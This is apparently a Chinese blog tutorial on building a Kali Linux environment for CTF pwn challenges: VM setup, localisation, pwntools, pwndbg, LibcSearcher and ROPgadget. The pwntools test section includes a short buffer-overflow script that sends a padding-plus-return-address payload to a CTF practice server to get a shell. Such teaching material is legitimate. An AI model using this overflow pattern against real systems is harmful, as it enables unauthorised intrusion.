CTF-PWN环境搭建手册

已于 2023-11-18 13:45:20 修改
阅读量2.2k 收藏 60
点赞数 9
分类专栏: CTF 文章标签: linux 运维 服务器
于 2023-11-17 21:40:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuwoxinana3/article/details/134360960
版权

         工欲善其事必先利其器,作为一名CTF的pwn手,一定要有自己的专用解题环境。本文将详细记录kali下的pwn解题环境的安装过程,B站也会配备配套视频。

目录

安装前的准备工作

虚拟机环境​编辑

VM版本安装教程

1. 下载Kali的VM虚拟机文件

2. 新建一个空白文件夹

3. 解压压缩包

4.打开VMware WorkStation

​编辑 5. 配置虚拟机的硬件

6.启动虚拟机

7.kali汉化步骤

​编辑

8.换源!

 9.中文输入法安装

pwn环境安装

1.pwntools安装

 1、安装指令

2、测试checksec

3、测试pwntools

2.gdb动态调试安装

1、原生gdb安装

 2、pwndbg安装

 3、测试安装

​编辑

3.LibcSearcher安装

4.ROPGadget安装

安装前的准备工作

虚拟机环境

VMware WorkStation

VM版本安装教程

1. 下载Kali的VM虚拟机文件

Kali的VM虚拟机文件

Kali的VM虚拟机文件可在Kali官网下载

kali官网
Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution

 左侧Installer Images为光盘镜像文件,右侧Vitrual Machines是我们这次下载的VM虚拟机文件

 点击这里下载

 最后得到压缩包

2. 新建一个空白文件夹

找一个空间大点的盘,新建这个文件夹,命名就叫Kali好了

3. 解压压缩包

把第一步下载的VM虚拟机文件,解压到当前目录下

对着文件右键解压文件,选中你创建的文件夹。

 

 等待解压完成

解压完成会得到

4.打开VMware WorkStation

点击打开虚拟机

 选中文件中的这个

 5. 配置虚拟机的硬件

打开虚拟机之前,需要调整硬件设置

 点击编辑虚拟机设置

 内存设置,电脑本机的内存的一半即可。

处理器1就行。核取一半(up的CPU只有8核)

硬盘其实60G就完全够用

配置完成记得点击确认保存

6.启动虚拟机

由于这个是配置好的,所以默认密码是kali/kali

 登录之后的样子,全英文有点难受

7.kali汉化步骤

全英文怎么玩!!!给我汉化

右键Kali的桌面,点击Open Terminal Here(在此处打开控制台)

 输入指令

一、进入root模式

sudo -i   #指令输入后,会要求输入kali的密码,也就是kali。注意,kali输密码光标是不会动的哦!

 

 已经入root模式就是红红的

二、更新源(不是换源!)

apt-get update

看到这烦人的下载速度没,这就提醒你该换源(下载服务器)了 ,CTRL+C结束,然后先去第8步换源吧

 

三、设置系统语言

sudo dpkg-reconfigure locales

下方向键一直按着

按到看到zh_CN

选中了之后,不要按回车!!!!!!

先按空格!!!!变成星星,我已踩坑

回车,如果没有zh_cn,证明没听我话,退回去重新操作就行

回车,接下里让它自己跑

重启系统应用汉化

reboot

这个不建议改成汉化的,因为经常要访问 ,英文路径好打

8.换源!

我看这篇写的挺好,那我就偷懒了,记得阿里和清华一起上
Kali 更换源(超详细,附国内优质镜像源地址)_kali换源-CSDN博客

 9.中文输入法安装

1.打开终端,输入以下命令:root权限哦

apt-get install ibus ibus-pinyin

记得点Y

reboot #重启

右上角切换

pwn环境安装

1.pwntools安装

 1、安装指令

进入root

sudo -i

安装指令 

sudo pip3 install pwntools

2、测试checksec

测试题目位置
NSSCTF | 在线CTF平台

把附件拖到kali中,重命名为pwn1,方便写指令。指令要在桌面路径执行哦。

checksec pwn1

3、测试pwntools

from pwn import *
xianyufen=remote("node1.anna.nssctf.cn",28029)#按照服务器地址和端口更改
payload=b'a'*0x2C+p64(0x41348000)
xianyufen.send(payload)
xianyufen.interactive()

我的是这样的

from pwn import *
xianyufen=remote("node4.anna.nssctf.cn",28492)#按照服务器地址和端口更改
payload=b'a'*0x2C+p64(0x41348000)
xianyufen.send(payload)
xianyufen.interactive()

在桌面用指令建一个python脚本

vim attack.py

然后就可以右键编辑了,用Mousepad打开

指令粘贴进去

控制台运行一下

python3 attack.py

再输个ls,即可看到flag,工具已正常安装

2.gdb动态调试安装

1、原生gdb安装

sudo apt install gdb

 2、pwndbg安装

访问github,获取安装指令
GitHub - pwndbg/pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy

 安装指令

# 下载仓库
git clone https://github.com/pwndbg/pwndbg

会得到pwndbg项目文件夹 

# 移动到文件夹下
cd pwndbg

# 可以用ls看一下当前目录下的文件

# 启动安装脚本
./setup.sh

安装时间会有点久

 

 3、测试安装

cd ../ #回到桌面
gdb pwn1   #上一节的栈文件,拿来测试

 显示的是pwndbg就对了,打个断点玩一下

b main  #main函数打个断点

quit  #退出

温馨提示:pwndbg那个文件夹别删除!

3.LibcSearcher安装

旧版LibcSearcher 安装发现报错   GitHub - lieanu/LibcSearcher: glibc offset search for ctf.

更换别的版本

项目地址如下:https://github.com/dev2ero/LibcSearcher

yH5BAAAAAAALAAAAAAOAA4AAAIMhI+py+0Po5y02qsKADs=

wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

安装指令

pip3 install LibcSearcher

代替在线工具 

4.ROPGadget安装

sudo pip install capstone

正常应该是successfully,但我这里好像在前面已经装好了 

 载项目

git clone https://github.com/JonathanSalwan/ROPgadget.git

移动至项目文件夹下

cd ROPgadget

 

安装指令

sudo python3 setup.py install

予我心安A3
关注
  • 9
    点赞
  • 60
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
pwn环境搭建_CTF必备技能丨Linux Pwn入门教程——环境配置
weixin_34804926的博客
12-30 343
说在前面这是一套Linux Pwn入门教程系列,作者依据Atum师傅在i春秋上的Pwn入门课程中的技术分类,并结合近几年赛事中出现的一些题目和文章整理出一份相对完整的Linux Pwn教程。问:为什么要花费精力去整理这套系统的Linux Pwn教程?答:网上关于Pwn的资料比较零散;经常会碰到解题过程略的Writeup和没有注释;存在大量硬编码偏移的脚本;练习题目难找;调试环境难搭建;GDB没有I...
python安装pwn_CTF pwn环境搭建
weixin_39906114的博客
01-13 195
供个人查阅使用安装pipapt-get install python-pip python-dev build-essentialpip换源cd ~mkdir -m 771 .pipcd .pipvim pip.conf[global]index-url = https://pypi.tuna.tsinghua.edu.cn/simple这里更换的是清华源也可以更换其他的阿里云 https://m...
从零开始搭建Ubuntu CTF-pwn环境
CoLin的pwn小屋
06-12 1万+
ctf pwn环境搭建(持续更新)
LibcSearcher安装的心路历程和坑____Python2,setuptools,libcsearcher其他版本
OrientalGlass的博客
01-04 2133
2.下载python2后,提示没有setuptools,这个setuptools应该指的是Python2版本的,因为之前使用其他命令时提示已经有了setuptools(推测这个是python3版本)在这篇文章得到解决方案。,我的ubuntu默认没有python2,只有python3,所以又下载了一个python2。只能试试手动安装了,就是在手动安装的过程中解决了2的setuptools问题。没有办法初始化,写脚本也无法成功导入模块,所以就下了另一个。然后就是下载数据库了,非常漫长,写完文章还没下好。
gdb使用个pwndbg安装
最新发布
biu801的博客
06-24 874
cyclc 50 //生成50个用来溢出的字符,如:aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama。heapinfo、heapinfoall //显示堆得信息,和bins的挺像的,没bins好用。set *(0x123456)=0x10 //0x123456地址的值变为0x10,注意带星号。tcachebins //同上,单独查看tcachebins的链表情况。largebins //同上,单独查看largebins的链表情况。
[二进制学习笔记]LibcSearcher安装
hide_in_darkness的博客
08-08 1793
​ 这是针对CTF比赛所做的小工具,在泄露了Libc中的某一个函数地址后,常常为不知道对方所使用的操作系统及libc的版本而苦恼,常规方法就是挨个把常见的Libc.so从系统里拿出来,与泄露的地址对比一下最后12位。​ 详细的安装过程其实github上就有,我在这里炒个冷饭(工具地址:https://github.com/lieanu/LibcSearcher)......
pwn环境搭建
SDPCTRM的博客
11-21 1667
pwn环境搭建,很全很新
从零开始入门pwn(二):环境搭建
热门推荐
m0_51466347的博客
12-10 1万+
一.前言 前几天写了一些关于pwn的介绍以及一些前置知识,其实那些知识都是浅尝辄止就行,重点还得放在后续的做题中,边做边学不香吗,不仅有成就感还能快速熟悉pwn绝对不是因为没时间去专门学。 但是之前的前置知识主要还是为了给那些真正没有基础的小白一个相对平滑的入门曲线,对于真正想要入门pwn的同学来说,前置知识其实都已经掌握过了 ...
ctf题库ctf-pwn赛题收集
03-31
此外,CTF题库也提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。在比赛中,参赛者可以学习新的技能,了解新的安全趋势,并结识志同道合的人。此外,CTF比赛也是一种很好的锻炼方式,...
pwn-environment:使用docker的ctf-pwn环境
05-11
环境 使用docker的ctf-pwn环境
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
PWN工具之Pwntools
CYXMDTT的博客
03-25 3915
pwntools是一个Python库,用于编写和利用漏洞利用工具和exploit代码。该库提供了许多功能,包括远程连接、二进制文件解析、shellcode生成、ROP链构建、GDB集成等,使渗透测试人员和安全研究人员更容易编写和测试漏洞利用代码。它是CTF竞赛和漏洞利用开发中广泛使用的工具之一。安装pwntools有多种方法,其中最简单的方法是使用pip包管理器。可以按照以下步骤安装pwntools。1:确认你已安装Python和pip。如果你还没有安装,先安装Python和pip。
PWN利器-pwntools安装、调试教程一览
samli的博客
12-05 6459
pwntools是一个CTF框架和漏洞利用的python开发库,专为快速开发而设计,旨在使漏洞利用编写尽可能简答
pwn 22.04环境搭建保姆级教程★
YX-hueimie
12-12 4364
本文章从零开始演示了如何搭建一个较为完整的打pwn的虚拟机环境,学完本文章,你将会有以下收获:一个又美又好用的Ubuntu 22.04虚拟机。
PWN环境搭建&工具安装
chenmou40的博客
09-23 2718
pwn环境搭建
CTF(Capture The Flag )环境搭建
怡红群芳的博客
03-24 3119
CTFd是目前最流行的开源CTF框架之一,是一个有Python开发的框架,侧重于易用性和可定制性。它提供了运行CTF题目所需要的一切条件,并可使用插件和主题轻松进行自定义。
PWN:pwntools的安装
m0_53932372的博客
07-01 2369
pwntools sudo apt update sudo apt install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential (安装pip3) pip3 -v (查看版本) pip换源 在根目录下创建文件夹: .pip 在.pip里创建文件: pip.conf 自行安装vim sudo apt vim 使用vim libcsearch pwndbg peda gef ......
ctfd-pwn赛题收集
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题可以包含多种类型的漏洞,例如缓冲区溢出、格式化字符串漏洞、整数溢出等。在收集赛题时需要确保涵盖各种漏洞类型,增加题目的多样性和挑战性。 2. 难度级别:赛题的难度级别应该根据参赛者的水平来确定。可以设置多个难度级别的赛题,包括初级、中级和高级,以便参赛者可以逐步提高自己的技能。 3. 原创性:收集ctfd-pwn赛题时应尽量保持赛题的原创性,避免过多的抄袭或重复的赛题。这有助于增加参赛者的学习价值,同时也能提高比赛的公平性。 4. 实用性:收集的赛题应该具有实际应用的意义,能够模拟真实的漏洞和攻击场景。这样可以帮助参赛者更好地理解和掌握系统安全的基本原理。 5. 文档和解答:为每个收集的赛题准备详细的文档和解答是很有必要的。这些文档包括赛题的描述、利用漏洞的步骤和参考资源等,可以帮助参赛者更好地理解赛题和解题思路。 6. 持续更新:CTF比赛的赛题应该定期进行更新和维护,以适应不断变化的网络安全环境。同时也要根据参赛者的反馈和需求,不断收集新的赛题,提供更好的比赛体验。 综上所述,ctfd-pwn赛题的收集需要考虑赛题类型、难度级别、原创性、实用性、文档和解答的准备,以及持续更新的需求。这样才能提供一个富有挑战性和教育性的CTF比赛平台。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

予我心安A3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值